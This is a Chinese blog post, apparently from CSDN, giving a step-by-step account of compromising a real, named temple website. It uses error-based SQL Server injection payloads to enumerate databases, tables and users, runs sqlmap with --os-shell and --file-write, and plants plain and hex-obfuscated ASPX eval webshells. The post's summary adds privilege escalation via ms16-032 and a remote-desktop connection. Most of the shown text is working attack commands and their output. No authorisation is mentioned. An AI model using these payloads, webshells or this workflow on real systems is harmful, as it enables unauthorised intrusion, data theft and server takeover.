牛掰!从sql注入到连接3389只需这几步

最新推荐文章于 2024-07-08 19:41:59 发布
最新推荐文章于 2024-07-08 19:41:59 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: 技术文 免费分享 文章标签: api 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Appleteachers/article/details/117121237
版权
本文详细介绍了如何利用SQL注入漏洞,从获取数据库信息到执行系统命令,最终通过ms16-032漏洞实现系统提权并连接3389远程桌面。通过分析过程,展示了从数据库权限判断、获取数据库信息、上传ASP木马到执行提权命令的完整步骤,最后探讨了msf模块使用中遇到的问题和解决办法。
摘要由CSDN通过智能技术生成

从sql注入到连接3389

数据库为sqlserver

判断字符、数字型、闭合方式

Microsoft OLE DB Provider for SQL Server 错误 ‘80040e14’

遗漏字元字串 ’ AND 显示状态Flag = 1 ORDER BY 排序 DESC ’ 后面的引号。

D:\S_JCIN\WEBSITE\OUTWEB\L_CT\NEWS…/…/…/_sysadm/_Function/DB_Function.asp, 列158
数字型。

判断是否是DBA

and 1=(select is_srvrolemember(‘sysadmin’))
select is_srvrolemember(‘sysadmin’)
判断是否是站库分离

http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=convert(int,(select host_name()))–&Pageno=1
将 nvarchar 值 ‘RENHAI’ 转换成资料类型 int 时,转换失败。
http://www.renhai.org.tw//xxx//News_content.asp?p0=264 and 1=convert(int,(select @@servername))–&Pageno=1
将 nvarchar 值 ‘RENHAI’ 转换成资料类型 int 时,转换失败。
主机名和服务器名一样,不是站库分离。

报错注入

1=convert(int,(db_name())) #获取当前数据库名

1=convert(int,(@@version)) #获取数据库版本

1=convert(int,(select quotename(name) from master…sysdatabases FOR XML PATH(’’))) #一次性获取全部数据库

1=convert(int,(select ‘|’%2bname%2b’|’ from master…sysdatabases FOR XML PATH(’’))) #一次性获取全部数据库
获取数据库

http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=convert(int,(select ‘|’ name ‘|’ from master…sysdatabases FOR XML PATH(’’)))&Pageno=1
将 nvarchar 值 ‘|master||tempdb||model||msdb||RenHai||RenHai2012||Renhai_LightSite||RenhaiDevelop||RenHai2012_bak|’ 转换成资料类型 int 时,转换失败。
USER信息

and 1=(select IS_SRVROLEMEMBER(‘db_owner’)) #查看是否为db_owner权限、sysadmin、public (未测试成功)如果正确则正常,否则报错

1=convert(int,(user)) #查看连接数据库的用户
http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=(select IS_SRVROLEMEMBER(‘public’))–&Pageno=1
返回正常。

http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=(select IS_SRVROLEMEMBER(‘db_owner’))–&Pageno=1
可能是 BOF 或 EOF 的值为 True,或目前的资料录已被删除。所要求的操作需要目前的资料录。
http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=convert(int,(user))–&Pageno=1
将 nvarchar 值 ‘dbo’ 转换成资料类型 int 时,转换失败。
获取表名

http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=convert(int,(select quotename(name) from RenHai…sysobjects where xtype=‘U’ FOR XML PATH(’’)))&Pageno=1
将nvarchar 值’[参数表][_WebVisitData][活动相簿主档][活动相簿分类][活动相簿内容][comd_list][D99_CMD][D99_Tmp][comdlist][jiaozhu][职称][订单明细暂存档][会员资料表][订单主档][订单明细档][登入纪录档][产品资料表][sysdiagrams][网站流量][系统设定档][sqlmapoutput][订单暂存档][流水号资料表][订单分类档][单位][订单状态档][太岁表][点灯位置资料表][性别表][庙宇资料表][一般分类][人员][公司基本资料] [人员权限][单位权限][权限][新闻][程式][dtproperties]’ 转换成资料类型int 时,转换失败。
获取列名

获取注入点的表中的列名

http://www.xxxx.com/xxx/News_content.asp?p0=264 having 1=1 --&Pageno=1
资料行 ‘新闻.流水号’ 在选取清单中无效,因为它并未包含在汇总函式或 GROUP BY 子句中。
获取任意表中的列名

http://www.xxxx.com/xxx/News_content.asp?p0=264 and 1=convert(int,(select * from RenHai…comd_list where id=(select max(id) from test…sysobjects where xtype=‘u’ and name=‘comd_list’)))&Pageno=1
获取数据

获取shell

判断权限

http://www.xxxx.com/xxx/News_content.asp?p0=264%20and%201=(select%20is_srvrolemember(%27sysadmin%27))–&Pageno=1
返回正常

sqlmap一把梭。

➜ ~ sqlmap -u “http://www.xxxx.com/xxx/News_content.asp?p0=264&Pageno=1” -p p0 --os-shell
根据之前爆出的路径,尝试写入shell。

D:/S_JCIN/WEBSITE/xxx/
os-shell> echo ‘<% @Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>’>D:/S_JCIN/WEBSITE/xxx/steady2.aspx
回显太慢。

os-shell> echo ‘<% @Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>’>D:/S_JCIN/WEBSITE/xxx/steady2.aspx
do you want to retrieve the command standard output? [Y/n/a] y
[14:13:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘–no-cast’ or switch ‘–hex’
[14:13:34] [WARNING] running in a single-thread mode. Please consider usage of option ‘–threads’ for faster data retrieval
[14:13:34] [INFO] retrieved:
[14:13:35] [WARNING] time-based comparison requires larger statistical model, please wait… (done)
[14:13:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘–time-sec’)? [Y/n] y
2
[14:13:58] [INFO] retrieved:
[14:13:59] [WARNING] (case) time-based comparison requires reset of statistical model, please wait… (done)
[14:14:14] [INFO] adjusting time delay to 2 seconds due to good response times

直接尝试sqlmap的–file选项

➜ ~ sqlmap -u “http://www.xxxx.com/xxx/News_content.asp?p0=264&Pageno=1” --file-write="/Users/apple/Downloads/漏洞盒子/shell/apsx马/asp小马/2.aspx" --file-dest=“D:/S_JCIN/WEBSITE/xxx/steady123.aspx”
使用os-shell命令,查看是否上传上去。

os-shell> dir D:\S_JCIN\WEBSITE\OUTWEB\L_CT\NEWS
2020/11/17 上午 09:08 9 shell.aspx
2014/12/17 下午 05:40 277 sidebar.asp
2020/11/17 上午 10:55 116 steady.aspx
2020/11/17 上午 10:56 116 steady.txt
2020/11/17 上午 11:24 8 steady1.txt
2020/11/17 下午 02:28 116 steady123.aspx
查看马是否连接成功

os-shell> type D:\S_JCIN\WEBSITE\OUTWEB\L_CT\NEWS\steady123.aspx
do you want to retrieve the command standard output? [Y/n/a] y
[14:36:13] [INFO] retrieved: ‘<%@PAGE LANGUAGE=JSCRIPT%>’
[14:36:13] [INFO] retrieved: ‘<%var PAY:String=Request["\x61\x62\x63\x64"];’
[14:36:13] [INFO] retrieved: ‘eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");’
[14:36:14] [INFO] retrieved: ‘%>’
command

最低0.47元/天 解锁文章
你永远不了解Thrash的魅力
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【实战系列 1】记一次从SQL注入3389远程登录Windows桌面并上线CobaltStrike
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-07 3485
大家好,欢迎来到我的实战系列专栏,这里的文章没有水分,全是实战干货,这是实战系列的第一篇,是测试一个系统发现的sql注入漏洞,最后上线cs的也是一个比较老的windws系统。
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1367
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的博客
11-25 2300
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入、字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上二次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的数字型关卡无过滤任何信息。
Hospital Management System v4.0 SQL 注入漏洞(CVE-2022-24263)
最新发布
Flag少侠的博客
07-08 9085
打开靶场进入靶场是这个页面网上查找漏洞相关信息点击登录可以看到有一个邮箱参数及密码,这里应该就是漏洞了打开 BurpSuite 拦截抓包复制值到 txt 文件中,使用 SQLMap 开跑省略爆库爆表过程……(太慢了)_____H__------[Y/n] n1ba6}[1 entry]| flag |
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7970
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
SQL报错注入小结
热门推荐
lixiangminghate的专栏
05-13 1万+
sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果无加区别的显示到前台页面上。上面这句话中,我用了2个"无加区别"-...
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4551
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
sql注入
weixin_43801718的博客
09-19 687
sql注入: 所谓的SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或请求页面的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入中最常见利用的系统数据库,经常利用...
安全测试-SQL注入
qq_42008891的博客
03-08 1463
SQL注入是针对一种数据库而言的,而不是针对网页语言。在任何使用了数据库查询环境下都可能存在。常见的数据库包括:MySQL、Oracle、Db2等。针对不同的数据库系统使用的一些函数会有所不同,不过从测试是否存在SQL注入的角度考虑,只要进行几个最基本的判断语句就可以了。由于SQL注入有可能造成信息泄漏,在严重情况下(根据使用的数据库而定)甚至可能造成数据修改、删除,从而导致业务中断。因此必须发现所有存在的注入点。
23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 913
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
简单的sql注入之2WP
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
info testing mysql_和讯财经某APP接口SQL注射
weixin_31062533的博客
02-06 134
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: http...
SQL注入时间盲注
qq_43936524的博客
03-13 6331
文章目录sqlmap日记溯源实例发现时间盲注构造时间盲注payload编写脚本成功跑出数据库名 sqlmap日记溯源 实例 发现时间盲注 一个实用的时间盲注fuzz payload 在一次测试中,发现一个参数存在时间盲注,fuzz的payload为desc,(select*from(select+sleep(2)union/**/select+1)a),其中(select*from(select+sleep(2)union/**/select+1)a))是检测时间盲注时一个很好用的fuzz payload。
Youke365_2_4 一处Sql注入漏洞以及一处任意文件删除
dfdhxb995397的博客
01-08 495
本文作者:X_Al3r Prat 0 自白 每一天都是新的一天。没啥吐槽的,步入正题 /system/category.php 文件一处Sql注入## 80-87行代码 $root_id = intval(trim($_POST['root_id'])); $cate_name = trim($_POST['cate_name']); ...
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4510
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
oracle %3c %3e符号,海尔旗下b2b商城日日顺oracle 注入
weixin_39980129的博客
04-03 207
看网站标题一会是日日顺b2b官网,一会是海尔b2b官网,把我都搞糊涂了查了备案,确实是你们的http://www.365rrs.com/notice/noticeDetail?pk=8796945030977[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutualconsent is illeg...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1254
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
【mac 安全渗透测试】之SQL注入Demo
LYX_WIN
12-22 3757
一、下载安装sqlmap 1、官网地址:sqlmap: automatic SQL injection and database takeover tool git下载: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2、验证sqlmap安装成功: ./sqlmap.py -v 显示如下日志则说明成功: __H__ ___ ___[)]_____ ___ ___ {1
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值